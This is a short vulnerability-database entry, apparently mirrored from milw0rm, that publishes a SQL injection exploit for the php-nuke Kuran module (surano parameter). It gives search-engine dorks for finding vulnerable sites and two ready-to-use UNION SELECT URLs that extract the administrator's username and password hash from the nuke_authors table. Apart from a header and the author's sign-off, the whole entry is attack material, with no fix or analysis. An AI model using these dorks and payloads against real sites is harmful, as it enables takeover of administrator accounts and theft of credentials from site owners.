Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19256
HistoryFeb 24, 2008 - 12:00 a.m.

php-nuke Kuran SQL Injection(surano)

2008-02-2400:00:00
vulners.com
8

###############################################################

php-nuke Kuran SQL Injection(surano)

###############################################################

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : [email protected]

################################################################

DORK 1 : allinurl: "modules php name Kuran"surano

DORK 2 : allinurl: "modules php name Kuran"

################################################################
EXPLOIT :

admin

modules.php?name=Kuran&action=viewayat&surano=-0000//union+select//0,aid,0,0,0//from//nuke_authors/*where%20admin1

pass

modules.php?name=Kuran&action=viewayat&surano=-0000//union+select//0,pwd,0,0,0//from//nuke_authors/*where%20admin1

################################################################

S@BUN i AM NOT HACKER S@BUN

################################################################